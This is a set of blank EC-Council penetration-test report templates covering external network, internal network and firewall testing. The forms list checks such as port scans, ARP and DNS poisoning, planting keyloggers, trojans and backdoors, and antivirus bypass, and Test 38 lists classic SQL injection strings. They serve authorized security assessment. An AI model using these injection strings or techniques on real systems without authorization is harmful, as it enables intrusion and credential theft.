Pen Testing Formats For Enterprises

EC-Council Licensed Penetration
Tester
Methodology: External Network Penetration Testing
Penetration Tester:
Organization:
Date: Location:
Confidential 1 Template ENPT/06

EC-Council Licensed Penetration Tester
Test 1: Perform information gathering
Target Organization
URL
List of cities the 1.
company is located 2.
3.
4.
5.
Companys Website 1.
Links 2.
3.
4.
5.
World Map of the

Cities where the
Company Resides
External Resource of 1.
the Targets 2.
Networks
3.
4.
5.
Confidential 2 Template ENPT/06 Copyright by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.
Companys Partner, 1.
Board of Directors, 2.
Employee
Information, and 3.
Contact Details 4.
5.
IP Address 1.
2.
3.
4.
5.
Domain Names 1.
2.
3.
4.
5.
Network Range 1.
2.
3.
4.
5.
Other Information 1.
Recovered 2.
3.
4.
5.
Tools/Services Used 1.
2.

3.
4.
5.
Results Analysis:

Test 2: Create topological map of the network
Target Organization
URL
Create Topological LAN/WAN Design
Map of the Network
Peer-to-Peer (P2P)
Network Topologies

Network Cabling
Customers and Partners Networked to other Systems
2.
3.
4.
5.
Results Analysis:

Test 3: Locate TCP/UDP traffic path to the destination
Target Organization
URL
TCP Traffic Path to
the Destination is Yes No
located Successfully
IP Address Traced
2.
3.
4.
5.
Results Analysis:

Test 4: Identify the physical location of the target servers
Target Organization
URL
Physical location of Hosted by
IP Address City Located Country
the target Servers Vendor
1.
2.
3.
4.
5.
2.
3.
4.
5.
Results Analysis:

Test 5: Locate the ISP servicing the client
Target Organization
URL
Name of the ISP
Pricing Plans 1.
2.
3.
Services Provided 1.
2.
3.
4.
Which other companies 1.

are assigned IP address 2.
from the same block
3.
4.
2.
3.
4.
Results Analysis:

Test 6: Examine the use of IPv6 at the remote location
Target Organization
URL
IP Addresses probed 1.
for IPV6 2.
3.
4.
5.
List of IP addresses 1.
using IPv6 2.
3.
4.
5.
2.
3.
4.
5.
Results Analysis:

Test 7: Examine the system uptime of target server
Target Organization
URL
Netblock
Server OS Last Seen IP Address Uptime
Owner
2.
3.
4.
5.
Results Analysis:

Test 8: Examine the patches applied to the target operating system
Target Organization
URL
OS Server Last Seen IP Address Netblock Owner
2.
3.
4.
5.
Results Analysis:

Test 9: Checking for live systems - ICMP scanning
Target Organization
URL
Command Used
Performed ICMP
Scanning on the Yes No
Target Successfully
Response Received
2.
3.
4.
5.
Results Analysis:

Test 10: Port scan every port (65,536) on the targets network
Target Organization
URL
IP Address Tested
Performed Complete
Port Scan of the Target Yes No
Network Successfully
2.
3.
4.
5.
Results Analysis:

Test 11: List open and closed ports
Target Organization
URL
IP Address Tested
List the Ports that are 1.
Open 2.
3.
4.
5.
6.
7.
8.
9.
10.
11.
12.
13.
14.
List the Ports that are 1.

Closed 2.
3.
4.
5.
6.
7.
8.
9.
10.
11.

12.
13.
14.
2.
3.
4.
Results Analysis:

Test 12: Use connect scan (Full open scan) on the target and see the response
Target Organization
URL
IP Address Scanned
Command Used
Performed Connect
Scan on the Target Yes No
Successfully
Response Received
2.
3.
4.
5.
Results Analysis:

Test 13: Use SYN scan (Half-open scan) on the target and see the response
Target Organization
URL
IP Address Scanned
Command Used
Performed SYN
Successfully
Response Received
2.
3.
4.
5.
Results Analysis:

Test 14: Use XMAS scan on the target and see the response
Target Organization
URL
IP Address Scanned
Command Used
Performed XMAS
Successfully
Response Received
2.
3.
4.
5.
Results Analysis:

Test 15: Use FIN scan on the target and see the response
Target Organization
URL
IP Address Scanned
Command Used
Performed FIN
Successfully
Response Received
2.
3.
4.
5.
Results Analysis:

Test 16: Use NULL scan on the target and see the response
Target Organization
URL
IP Address Scanned
Command Used
Performed NULL
Successfully
Response Received
2.
3.
4.
5.
Results Analysis:

Test 17: Use ACK flag probe scan on the target and see the response
Target Organization
URL
IP Address Scanned
Command Used
Performed ACK flag
probe Scan on the Yes No
Target Successfully
Response Received
2.
3.
4.
5.
Results Analysis:

Test 18: Use UDP scan on the target and see the response
Target Organization
URL
IP Address Scanned
Command Used
Performed UDP
Successfully
Response Received
2.
3.
4.
5.
Results Analysis:

Test 19: Use fragmentation scanning and examine the response
Target Organization
URL
IP Address Scanned
Command Used
Performed
Fragmentation
Yes No
Scan on the Target
Successfully
Response Received
2.
3.
4.
5.
Results Analysis:

Test 20: OS fingerprint target servers
Target Organization
URL
Target Servers IP Address Operating System Used
1.
2.
3.
4.
5.
6.
7.
8.
9.
2.
3.
4.
5.
Results Analysis:

Test 21: Grab the banner of HTTP servers
Target Organization
URL
Captured the Banner of
Yes No
HTTP Server Successfully
Identified HTTP Web
Server
2.
3.
4.
5.
Results Analysis:

Test 22: Grab the banner of SMTP servers
Target Organization
URL
Yes No
SMTP Server Successfully
2.
3.
4.
5.
Results Analysis:

Test 23: Grab the banner of POP3 servers
Target Organization
URL
Yes No
POP3 Server Successfully
2.
3.
4.
5.
Results Analysis:

Test 24: Grab the banner of FTP servers
Target Organization
URL
Yes No
FTP Server Successfully
2.
3.
4.
5.
Results Analysis:

Test 25: Firewalk on the routers gateway and guess the access list
Target Organization
URL
IP Address Firewalked
Response Received
2.
3.
4.
5.
Results Analysis:

Test 26: Examine TCP sequence number prediction
Target Organization
URL
IP Address Tested
Command Used
Sequence Numbers 1.
Predicted 2.
3.
4.
5.
6.
7.
8.
9.
10.
2.
3.
4.
5.
Results Analysis:

Test 27: Examine IPID sequence number prediction
Target Organization
URL
IP Address Tested
IPID number predicted 1.
2.
3.
4.
5.
6.
7.
8.
2.
3.
4.
5.
Results Analysis:

Test 28: Examine the use of standard and non-standard protocols
Target Organization
URL
IP Address Tested
Standard Protocols 1.
Used 2.
3.
4.
5.
Non-Standard 1.
Protocols Used 2.
3.
4.
5.
2.
3.
4.
5.
Results Analysis:

Test 29: Download applications from the companys website and reverse engineer the
binary code
Target Organization
URL
Downloaded Application
Name of the Application Type of Application
from URL
1.
2.
3.
4.
5.
6.
7.
8.
9.
10.
Information looked at 1.
by Reverse Engineering 2.
the Binary Code
3.
4.
5.
6.
7.
2.
3.
4.
5.

Results Analysis:

Test 30: List programming languages used and application software to create various
programs from the target server
Target Organization
URL
Type of Application Commercial In-House
Programming AppleScript
Languages Used by
Web Application C
AWK
C++
JavaScript
C#
PERL
COBOL
PHP
Java
Python
J++
Ruby
J#
Tcl
PowerBuilder
VBScript
Visual Basic
Others: _________________________
_________________________
2.
3.
4.

Results Analysis:

Test 31: Look for error and custom web pages
Target Organization
URL
List of Tested URL 1.
Strings 2.
3.
4.
5.
6.
7.
8.
Error Message 1.
Location URLs 2.
3.
4.
Content of the
Message
2.
3.
4.
Results Analysis:

Test 32: Guess various subdomain names and analyze responses
Target Organization
URL
Main Domain
List of Sub Domain 1.
Names and their 2.
Responses
3.
4.
5.
6.
7.
8.
9.
10.
2.
3.
4.
5.
Results Analysis:

Test 33: Examine the session variables
Target Organization
URL
Website URL tested
Session variable Value
1.
2.
3.
4.
5.
6.
7.
8.
9.
10.
11.
2.
3.
4.
5.
Results Analysis:

Test 34: Perform various attacks on web applications
Target Organization
URL
Web Application URL Encoding
Attack Type Buffer Overflow
Cross Site Scripting (XSS)
Other
URL Encoding
Web Page URL Encodings Response Received
1.
2.
3.
4.
5.
6.
7.
8.
9.
10.
11.
12.
2.
3.
4.
5.

Buffer Overflow
Buffer Overflow Text
Web Page Response Received
Attempted
1.
2.
3.
4.
5.
6.
7.
8.
9.
10.
11.
12.
2.
3.
4.
Cross Site Scripting (XSS)

Vulnerabilities in Cross Site Scripting
Web Page Tested Response Received
Script Attempted
1.
2.
3.
4.
5.
6.

7.
8.
9.
10.
11.
12.
2.
3.
4.
5.
Results Analysis:

Test 35: Check for directory consistency and page naming syntax of the web pages
Target Organization
URL
Directory Consistency
Web Page URL
and Page Naming Syntax
1. Logical directory
Files named based on naming
conventions
Repository for images, pdf, and other
documents
Repository for sensitive information
Structured links and pages
Site outline
2. Logical directory
Files named based on naming
conventions
Repository for images, pdf, and other
documents
Repository for sensitive information
Structured links and pages
Site outline
2.
3.
4.
5.
Results Analysis:

Test 36: Look for sensitive information in web page source code
Target Organization
URL
Website URL Tested
Source Code Leakage 1.
2.
3.
4.
5.
6.
7.
8.
9.
10.
2.
3.
4.
5.
Results Analysis:

Test 37: Record and replay the traffic to the target web server and note the response
Target Organization
URL
Website URL
Recorded Browser 1.
Sessions 2.
3.
4.
5.
Replay Packet Size

Response Received
2.
3.
4.
5.
Results Analysis:

Test 38: Perform SQL injection
Target Organization
URL
Website URL Tested
Tested Strings ' or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
") or ("a"="a
Attempted Locations Form fields
Directly in URL
Login screens
Feedback forms
Guestbook
2.
3.
4.
5.
Results Analysis:

Test 39: Examine Server Side Includes (SSI)
Target Organization
URL
Web Page Include Command Web Server Directory
1.
2.
3.
4.
5.
6.
7.
8.
9.
10.
2.
3.
4.
5.
Results Analysis:

Test 40: Examine e-commerce and payment gateways handled by the web server
Target Organization
URL
In-house built
e-commerce gateway
Outsourced
e-commerce gateway
Program Logic
How Payments are
Handled
Confirmation Emails
Minimum Order Amount
Account and Merchant ID
2.
3.
4.
5.
Results Analysis:

Test 41: Examine welcome messages, error messages, and debug messages
Target Organization
URL
Web Application
Welcome Message
Web Application Error 1.
Messages 2.
3.
4.
Web Application 1.
Intrusion Warning 2.
Messages
3.
4.
Web Application 1.
Debugging Messages 2.
3.
4.
Web Application Site 1.

Maintenance Messages 2.
3.
4.
2.
3.
4.
5.

Results Analysis:

Test 42: Probe the service by SMTP mail bouncing
Target Organization
URL
Mail Sent to
SMTP Bounced Back the
Yes No
Mail
Search in the Bounce Server Name:
Mail Version:
Services Running on Server:
2.
3.
4.
5.
Results Analysis:

Test 43: Identify the web extensions used at the server
Target Organization
URL
Web Extensions 1.
Discovered 2.
3.
4.
5.
Web Server Type and

Version
2.
3.
4.
5.
Results Analysis:

Test 44: Try to use an HTTPS tunnel to encapsulate traffic
Target Organization
URL
Encapsulated Traffic
using HTTPS Tunnel Yes No
Successfully
2.
3.
4.
5.
Results Analysis:

Test 45: Port scan DNS servers (TCP/UDP 53)
Target Organization
URL
Command Used
Target System
Port State Service
IP Address
1.
2.
3.
4.
5.
6.
7.
2.
3.
4.
5.
Results Analysis:

Test 46: Port scan TFTP servers (Port 69)
Target Organization
URL
Command Used
Target System
Port State
IP Address
1.
2.
3.
4.
5.
6.
7.
2.
3.
4.
5.
Results Analysis:

Test 47: Test for NTP ports (Port 123)
Target Organization
URL
Command Used
Target System
Port State Service
IP Address
1.
2.
3.
4.
5.
6.
7.
2.
3.
4.
5.
Results Analysis:

Test 48: Test for SNMP ports (Port 161)
Target Organization
URL
Command Used
Target System
Port State Service
IP Address
1.
2.
3.
4.
5.
6.
7.
2.
3.
4.
5.
Results Analysis:

Test 49: Test for Telnet ports (Port 23)
Target Organization
URL
Command Used
Target System
Port State Service
IP Address
1.
2.
3.
4.
5.
6.
7.
2.
3.
4.
5.
Results Analysis:

Test 50: Test for LDAP ports ( Port 389)
Target Organization
URL
Command Used
Target System
Port LDAP Query Response
IP Address
1.
2.
3.
4.
5.
6.
7.
2.
3.
4.
5.
Results Analysis:

Test 51: Test for NetBIOS ports ( Ports 135-139, 445)
Target Organization
URL
Command Used
Target System
Port State Service
IP Address
1.
2.
3.
4.
5.
6.
7.
2.
3.
4.
5.
Results Analysis:

Test 52: Test for SQL server ports (Port 1433, 1434)
Target Organization
URL
Command Used
Target System
Port State Service
IP Address
1.
2.
3.
4.
5.
6.
7.
2.
3.
4.
5.
Results Analysis:

Test 53: Test for Citrix ports (Port 1495)
Target Organization
URL
Command Used
Target System
Port State Service
IP Address
1.
2.
3.
4.
5.
6.
7.
2.
3.
4.
5.
Results Analysis:

Test 54: Test for Oracle ports (Port 1521)
Target Organization
URL
Command Used
Target System
Port State Service
IP Address
1.
2.
3.
4.
5.
6.
7.
2.
3.
4.
5.
Results Analysis:

Test 55: Test for NFS ports (Port 2049)
Target Organization
URL
Command Used
Target System
Port State Service
IP Address
1.
2.
3.
4.
5.
6.
7.
2.
3.
4.
5.
Results Analysis:

Test 56: Test for Compaq, HP Inside Manager ports (Port 2301, 2381)
Target Organization
URL
Command Used
Target System
Port State Service
IP Address
1.
2.
3.
4.
5.
6.
7.
2.
3.
4.
5.
Results Analysis:

Test 57: Test for Remote Desktop ports (Port 3389)
Target Organization
URL
Command Used
Target System
Port State Service
IP Address
1.
2.
3.
4.
5.
6.
7.
2.
3.
4.
5.
Results Analysis:

Test 58: Test for Sybase ports (Port 5000)
Target Organization
URL
Command Used
Target System
Port State Service
IP Address
1.
2.
3.
4.
5.
6.
7.
2.
3.
4.
5.
Results Analysis:

Test 59: Test for SIP ports (Port 5060)
Target Organization
URL
Command Used
Target System
Port State Service
IP Address
1.
2.
3.
4.
5.
6.
7.
2.
3.
4.
5.
Results Analysis:

Test 60: Test for VNC ports (Port 5900/5800)
Target Organization
URL
Command Used
Target System
Port State Service
IP Address
1.
2.
3.
4.
5.
6.
7.
2.
3.
4.
5.
Results Analysis:

Test 61: Test for X11 ports (Port 6000)
Target Organization
URL
Command Used
Target System
Port State Service
IP Address
1.
2.
3.
4.
5.
6.
7.
2.
3.
4.
5.
Results Analysis:

Test 62: Test for Jet Direct ports (Port 9100)
Target Organization
URL
Command Used
Target System
Port State Service
IP Address
1.
2.
3.
4.
5.
6.
7.
2.
3.
4.
5.
Results Analysis:

Test 63: Port scan FTP data (Port 20)
Target Organization
URL
Command Used
Target System
Port State Service
IP Address
1.
2.
3.
4.
5.
6.
7.
2.
3.
4.
5.
Results Analysis:

Test 64: Port scan web servers (Port 80)
Target Organization
URL
Command Used
Target System
Port State Service
IP Address
1.
2.
3.
4.
5.
6.
7.
2.
3.
4.
5.
Results Analysis:

Test 65: Port scan SSL servers (Port 443)
Target Organization
URL
Command Used
Target System
Port State Service
IP Address
1.
2.
3.
4.
5.
6.
7.
2.
3.
4.
5.
Results Analysis:

Test 66: Port scan Kerberos-Active Directory (Port TCP/UDP 88)
Target Organization
URL
Command Used
Target System
Port State Service
IP Address
1.
2.
3.
4.
5.
6.
7.
2.
3.
4.
5.
Results Analysis:

Test 67: Port scan SSH servers (Port 22)
Target Organization
URL
Command Used
Target System
Port State Service
IP Address
1.
2.
3.
4.
5.
6.
7.
2.
3.
4.
5.
Results Analysis:

Test 68: Perform vulnerability scanning
Target Organization
URL
Vulnerability
Assessment Timeline
2.
3.
4.
5.
Results Analysis:

Tester
Methodology: Internal Network Penetration Testing
Penetration Tester:
Organization:
Date: Location:
Confidential 1 Template INPT/07

Test 1: Perform information gathering
Target Organization
URL
List of Internal 1.
Resource 2.
3.
4.
5.
Companys Partner, 1.
Board of Directors, 2.
Employee
Information, and 3.
Contact Details 4.
5.
IP Address 1.
2.
3.
4.
5.
Domain Names 1.
2.
3.
4.
5.
Network Range 1.
2.
3.
4.
Confidential 2 Template INPT/07 Copyright by EC-Council

5.
ISPs 1.
2.
3.
4.
5.
Recovered 2.
3.
4.
5.
2.
3.
4.
5.
Results Analysis:

Test 2: Map the internal network
Target Organization
URL
List the Network Devices Discovered Make and Model
Hubs
Switches
Servers
Printers
Workstations
Wireless Access Points
Firewalls
Proxy Servers
No. of Client Computers
Others 1. ---------------------------------------
2. ---------------------------------------
3. --------------------------------------
2.
3.
4.
5.
Results Analysis:

Test 3: Scan the network for live hosts
Target Organization
URL
Subnet scanned
List the IP Address of 1.
live hosts 2.
3.
4.
5.
6.
7.
8.
9.
10.
11.
12.
13.
14.
15.
16.
17.
18.
19.
20.
21.
22.
23.
24.
25.

26.
27.
28.
29.
30.
31.
32.
33.
34.
35.
36.
2.
3.
4.
5.
Results Analysis:

Test 4: Port-scan the individual machines
Target Organization
URL
IP Address Machine Name Ports Open
1.
2.
3.
4.
5.
6.
7.
8.
9.
10.
11.
12.
13.
14.
15.
16.
17.
18.
19.
20.
21.
22.
23.
24.
25.

26.
27.
28.
29.
30.
31.
32.
33.
34.
35.
2.
3.
4.
5.
Results Analysis:

Test 5: Try to gain access using known vulnerabilities
Target Organization
URL
IP Address Tested
Machine Name
Vulnerability 1.
Exploited 2.
3.
4.
5.
6.
7.
8.
9.
10.
11.
12.
13.
14.
15.
16.
17.
18.
19.
20.
21.
22.
23.
24.

2.
3.
4.
5.
Results Analysis:

Test 6: Attempt to establish null sessions
Target Organization
URL
IP Address Tested
Machine Name
Is Null Session
Yes No
Attempted Successful?
If Successful, list the 1.
Enumerated 2.
Usernames and Other
Information here 3.
4.
5.
6.
7.
8.
9.
10.
11.
12.
13.
14.
15.
16.
17.
18.
19.
20.
21.
22.

2.
3.
4.
5.
Results Analysis:

Test 7: Perform enumeration
Target Organization
URL
IP Address Tested
Machine Name
Enumerating Users,
Password Policies, and
Group Policies based Yes No
on the Established Null
Session is Successful
If Successful, list the 1.
Information Obtained 2.
here
3.
4.
5.
6.
7.
8.
9.
10.
11.
12.
13.
14.
15.
16.
17.
18.
19.
20.

2.
3.
4.
5.
Results Analysis:

Test 8: Sniff the network
Target Organization
URL
Is Sniffing the Network
Yes No
Successful?
Interesting Traffic 1.
Traversing on the Network 2.
3.
4.
5.
6.
7.
8.
9.
10.
List the passwords sniffed Protocol Username Password

1.
2.
3.
4.
5.
6.
7.
8.
9.
10.
List the Email Messages 1.
Sniffed 2.
3.

4.
5.
6.
7.
8.
9.
10.
11.
12.
13.
14.
15.
16.
17.
18.
2.
3.
4.
5.
Results Analysis:

Test 9: Check for ICMP responses from broadcast address
Target Organization
URL
Command Used
Performed ICMP
Scanning on the Yes No
Target Successfully
Response Received
2.
3.
4.
5.
Results Analysis:

Test 10: Attempt replay attacks
Target Organization
URL
Victim IP Address
Targeted
Original Message
Captured
Replayed Messages
2.
3.
4.
5.
Results Analysis:

Test 11: Attempt ARP poisoning
Target Organization
URL
Victim IP Address
Poisoned IP Address
Victim MAC Address
Poisoned MAC Address
2.
3.
4.
5.
Results Analysis:

Test 12: Attempt MAC flooding
Target Organization
URL
Is Flooding the Network
with Bogus MAC Yes No
Addresses Successful?
2.
3.
4.
5.
Results Analysis:

Test 13: Conduct a Man-in-the-Middle attack
Target Organization
URL
Victim Machine
Target Machine
MITM Machine
Intercepted the
Communication Channel
Yes No
between the Victim and
the Target Successfully?
2.
3.
4.
5.
Results Analysis:

Test 14: Attempt DNS poisoning
Target Organization
URL
Victim Machine
List the Hosts added 1.
into the Cache of a DNS 2.
Server to Corrupt the
DNS Tables 3.
4.
5.
6.
7.
8.
9.
10.
11.
12.
13.
14.
15.
16.
17.
Is DNS Poisoning
Yes No
Attempt Successful
2.
3.
4.
5.

Results Analysis:

Test 15: Try to log into a console machine
Target Organization
URL
Victim Machine
Username
Default Password
Is Logging into a
Console Machine Yes No
Successful?
2.
3.
4.
5.
Results Analysis:

Test 16: Boot the PC using alternate OS and steal the SAM file
Target Organization
URL
Victim Machine
Username Reset
Password Reset
2.
3.
4.
5.
Results Analysis:

Test 17: Reset the local administrator or other user account passwords
Target Organization
URL
Victim Machine
Username Reset
Password Reset
2.
3.
4.
5.
Results Analysis:

Test 18: Attempt to plant a software keylogger to steal passwords
Target Organization
URL
Victim Machine
Installation of Software
Keylogger on the Victim Yes No
Machine Successful
Captured Keystrokes 1.
2.
3.
4.
5.
6.
7.
8.
2.
3.
4.
5.
Results Analysis:

Test 19: Attempt to plant a hardware keylogger to steal passwords
Target Organization
URL
Victim Machine
Installation of
Hardware Keylogger
Yes No
on the Victim
Machine Successful
Captured Keystrokes 1.
2.
3.
4.
5.
6.
7.
8.
2.
3.
4.
5.
Results Analysis:

Test 20: Attempt to plant spyware on the target machine
Target Organization
URL
Victim Machine
Installed Spyware on
the Victim Machine Yes No
Successfully
2.
3.
4.
5.
6.
7.
8.
2.
3.
4.
5.
Results Analysis:

Test 21: Attempt to plant a Trojan on the target machine
Target Organization
URL
Victim Machine
Installed Trojan on
the Victim Machine Yes No
Successfully
2.
3.
4.
5.
6.
7.
8.
9.
10.
2.
3.
4.
5.
Results Analysis:

Test 22: Attempt to create a backdoor account on the target machine
Target Organization
URL
Victim Machine
Backdoor Account on
the Target Machine is Yes No
Created Successfully
Backdoor Behavior
2.
3.
4.
5.
6.
7.
8.
9.
10.
2.
3.
4.
5.
Results Analysis:

Test 23: Attempt to bypass antivirus software installed on the target machine
Target Organization
URL
Victim Machine
Anti-Virus Installed on
the Victim Machine
Details of the Program 1.
Created to bypasses 2.
the Anti-Virus rules
3.
4.
Anti-Virus Evaded Yes No

2.
3.
4.
5.
Results Analysis:

Test 24: Attempt to send a virus using the target machine
Target Organization
URL
Victim Machine
Type of Virus
Successfully sent Virus
via Target Machine to
Yes No
Spread throughout the
Network
Viruses Used 1.
2.
3.
4.
5.
Results Analysis:

Test 25: Attempt to plant rootkits on the target machine
Target Organization
URL
Victim Machine
Type of Rootkit
Installed Rootkit on
the target machine Yes No
Successfully
Rootkits Used 1.
2.
3.
4.
5.
Results Analysis:

Test 26: Hide sensitive data on target machines
Target Organization
URL
Victim Machine
Steganography
Technique used
Sensitive Data IP addresses
Hidden Source code
Pictures
Word documents Spreadsheets
Hacking Tools
Secret Information
Pornography images
Others
2.
3.
4.
5.
Results Analysis:

Test 27: Hide hacking tools and other data on target machines
Target Organization
URL
Victim Machine
Steganography
Technique used
Hacking Tools and 1.
other Data Hidden 2.
3.
4.
5.
6.
7.
8.
9.
10.
2.
3.
4.
5.
Results Analysis:

Test 28: Use various steganography techniques to hide files on target machines
Target Organization
URL
Victim Machine
Steganography 1.
Techniques used 2.
3.
4.
5.
Hidden Data 1.
2.
3.
4.
5.
6.
7.
8.
2.
3.
4.
5.
Results Analysis:

Test 29: Escalate user privileges
Target Organization
URL
Victim Machine
Escalated User
Yes No
Privileges Successfully
2.
3.
4.
5.
Results Analysis:

Test 30: Run Wireshark with the filter ip.src == [ip_address]
Target Organization
URL
Filter Used
Source ip_address
Captured Traffic
Yes No
Successfully
Description of the Time:
Packets Captured Source:
Destination:
Protocol:
Length:
Info:
2.
3.
4.
5.
Results Analysis:

Test 31: Run Wireshark with the filter ip.dst == [ip_address]
Target Organization
URL
Filter Used
Destination ip_address
Captured Traffic
Yes No
Successfully
Destination:
Protocol:
Length:
Info:
2.
3.
4.
5.
Results Analysis:

Test 32: Run Wireshark with protocol-based filters
Target Organization
URL
Filter Used
Target IP Address
Captured Traffic
Yes No
Successfully
Destination:
Protocol:
Length:
Info:
2.
3.
4.
5.
Results Analysis:

Test 33: Run Wireshark with the filter tcp.port == [port_no]
Target Organization
URL
Filter Used
Port Number
Captured Traffic
Yes No
Successfully
Destination:
Protocol:
Length:
Info:
2.
3.
4.
5.
Results Analysis:

Test 34: Capture POP3 traffic
Target Organization
URL
Filter Used
Captured POP3
Yes No
Traffic Successfully
Destination:
Protocol:
Length:
Info:
2.
3.
4.
5.
Results Analysis:

Test 35: Capture SMTP traffic
Target Organization
URL
Filter Used
Captured Incoming
and Outgoing SMTP Yes No
Destination:
Protocol:
Length:
Info:
2.
3.
4.
5.
Results Analysis:

Test 36: Capture IMAP email traffic
Target Organization
URL
Filter Used
Captured IMAP Email
Yes No
traffic Successfully
Destination:
Protocol:
Length:
Info:
2.
3.
4.
5.
Results Analysis:

Test 37: Capture the communications between FTP client and FTP server
Target Organization
URL
Captured the communications
between the FTP client and Yes No
FTP server Successfully
2.
3.
4.
5.
Results Analysis:

Test 38: Capture HTTP traffic
Target Organization
URL
Filter Used
Captured HTTP
Yes No
Destination:
Protocol:
Length:
Info:
2.
3.
4.
5.
Results Analysis:

Test 39: Capture HTTPS traffic
Target Organization
URL
Filter Used
Captured HTTPS
Yes No
Description of the Offset:
Packets Captured Timeline:
Duration:
Method:
Result:
Received:
Type URL:
Redirect URL:
Request Headers Info:
Response Headers Info:
Others:
2.
3.
4.
5.
Results Analysis:

Test 40: Capture RDP traffic
Target Organization
URL
Filter Used
Captured RDP Traffic
Yes No
Successfully
Destination:
Protocol:
Length:
Info:
2.
3.
4.
5.
Results Analysis:

Test 41: Capture VoIP traffic
Target Organization
URL
Filter Used
Captured VoIP Traffic
Yes No
Successfully
Destination:
Protocol:
Length:
Info:
2.
3.
4.
5.
Results Analysis:

Test 42: Spoof the MAC address
Target Organization
URL
Victim Machine
Spoofed the MAC
Yes No
Address Successfully
Spoofed MAC Address
2.
3.
4.
5.
Results Analysis:

Test 43: Poison the victims IE proxy server
Target Organization
URL
Victim Machine
Poisoned the
Victims IE Proxy Yes No
Server Successfully
2.
3.
4.
5.
Results Analysis:

Test 44: Attempt session hijacking on Telnet traffic
Target Organization
URL
Implemented Session
Hijacking Technique on Yes No
Telnet Traffic Successfully
Telnet Commands 1.
2.
3.
2.
3.
4.
5.
Results Analysis:

Test 45: Attempt session hijacking on FTP traffic
Target Organization
URL
Implemented
Session Hijacking
Yes No
Technique on FTP
2.
3.
4.
5.
Results Analysis:

Test 46: Attempt session hijacking on HTTP traffic
Target Organization
URL
Implemented
Session Hijacking
Yes No
Technique on HTTP
2.
3.
4.
5.
Results Analysis:

Tester
Methodology: Firewall Penetration Testing
Penetration Tester:
Organization:
Date: Location:
Confidential 1 Template FPT/08

Test 1: Find information about the target
Target Organization
URL
Information
Available
Companys Name
Server
Topographic
Information
Target IP Address
2.
3.
4.
5.
Results Analysis:
Confidential 2 Template FPT/08 Copyright by EC-Council

Test 2: Perform WHOIS lookup and locate the network range
Target Organization
URL
Domain Name
Domain Name
Servers
IP Address
IP Location
ASN
NetRange
CIDR
Handle
Parent
Net Type
RESTful Link
2.
3.
4.
5.
Results Analysis:

Test 3: Perform port scanning
Target Organization
URL
Open Ports
7 Echo 109 Post Office Protocol 2 (POP2)
13 DayTime 110 Post Office Protocol 3 (POP3)
17 Quote of the Day (QOTD) 113 IDENT
20 and 21 File Transfer Protocol (FTP) 115 Simple File Transfer Protocol (SFTP)
22 Secure Socket Shell (SSH) 137, 138, and 139 NetBIOS
23 Telnet 143 Internet Message Access Protocol
(IMAP)
25 SMTP 161 and 162 Simple Network Management
Protocol
53 Domain Name System (DNS) 194 Internet Relay Chat (IRC)
63 Whois 443 HTTPS
66 SQL*net (Oracle) Other Ports:
70 Gopher
79 Finger
80 HTTP
88 Kerberos
101 Host Name Server
2.
3.
4.
Results Analysis:

Test 4: Locate the firewall using packet crafter
Target Organization
URL
Firewall Location
Firewall IP Address
2.
3.
4.
5.
Results Analysis:

Test 5: Locate the firewall by conducting traceroute
Target Organization
URL
Firewall Location
Firewall IP Address
Network Topology
Routers
Filtering Devices
Protocols Allowed
Protocols Denied
IP Addresses Hoped
1.
2.
3.
4.
5.
6.
7.
8.
9.
10.
11.
12.
13.
14.
15.
16.
17.

18.
19.
20.
21.
2.
3.
4.
5.
Results Analysis:

Test 6: Grab the banner
Target Organization
URL
Banner Message
Firewall Vender 1.
2.
3.
Firewall Version 1.
2.
3.
Running Services 1.
2.
3.
4.
5.
2.
3.
4.
5.

Results Analysis:

Test 7: Create custom packets and look for firewall responses
Target Organization
URL
IP of Tested Firewall
S. No. Custom Packet Response
1.
2.
3.
4.
5.
2.
3.
4.
5.
Results Analysis:

Test 8: Test access control enumeration
Target Organization
URL
Access Controls 1.
2.
3.
4.
5.
6.
7.
8.
9.
10.
2.
3.
4.
5.
Results Analysis:

Test 9: Identify the firewall architecture
Target Organization
URL
Firewall Architecture
Details
2.
3.
4.
5.
Results Analysis:

Test 10: Test the firewall policy
Target Organization
URL
Firewall Configuration Policy is Available Yes No
Firewall is Configured as par Policy Yes No
Firewall Policy Defines All Expected Standard Configuration Yes No
Gap Between Policy
and Firewall
Implementation
2.
3.
4.
5.
Results Analysis:

Test 11: Test the firewall using a firewalking tool
Target Organization
URL
Firewalking Traceroute Scanning
Technique used
Internal IPs 1.
Discovered 2.
3.
4.
5.
2.
3.
4.
5.
Results Analysis:

Test 12: Test for port redirection
Target Organization
URL
Port Redirection
Results
2.
3.
4.
5.
Results Analysis:

Test 13: Test the firewall from both sides
Target Organization
URL
Unauthorized connections from the internal network to Yes No
the Internet can be created
Vulnerabilities 1.
identified by 2.
scanners
3.
4.
5.
Reaction of the
firewall to
fragmented and
spoofed packets
Identified Firewall 1.
Rules 2.
3.
4.
5.
2.
3.
4.
5.

Results Analysis:

Test 14: Overt firewall test from outside
Target Organization
URL
Unauthorized Connections from the Internal Network to Yes No
the Internet can be Created
Vulnerabilities 1.
Identified by 2.
Scanners
3.
4.
5.
Reaction of the
Firewall to
Fragmented and
Spoofed Packets
Rules 2.
3.
4.
5.
2.
3.
4.
5.

Results Analysis:

Test 15: Test covert channels
Target Organization
URL
Successfully installed Backdoor on a Victim Machine inside Yes No
the Network
Successfully Established Reverse Connection to a Machine Yes No
Outside the Firewall
Successfully Bypassed Firewall and Router Security Yes No
Restrictions
2.
3.
4.
5.
Results Analysis:

Test 16: Covert firewall test from outside
Target Organization
URL
Unauthorized Connections from the Internet to the Yes No
Internal Network can be Created
Vulnerabilities 1.
Identified by 2.
Scanners
3.
4.
5.
Reaction of the
Firewall to
Fragmented and
Spoofed packets
Rules 2.
3.
4.
5.
2.
3.
4.
5.

Results Analysis:

Test 17: Try to bypass firewall using IP address spoofing
Target Organization
URL
Modified Addressing
Information
2.
3.
4.
5.
Results Analysis:

Test 18: Try to bypass the firewall using tiny fragments
Target Organization
URL
TCP packets header
information
IDS filter rules 1.
2.
3.
4.
5.
2.
3.
4.
5.
Results Analysis:

Test 19: Try to bypass the firewall using IP address in place of URL
Target Organization
URL
Domain Names 1.
2.
3.
4.
5.
IP Address of the
Blocked Website
2.
3.
4.
5.
Results Analysis:

Test 20: Try to bypass the firewall using anonymous website surfing sites
Target Organization
URL
Anonymous Website 1.
Surfing Sites 2.
3.
4.
5.
2.
3.
4.
5.
Results Analysis:

Test 21: Try to bypass the firewall using a proxy server
Target Organization
URL
IP Address of the
Proxy Server
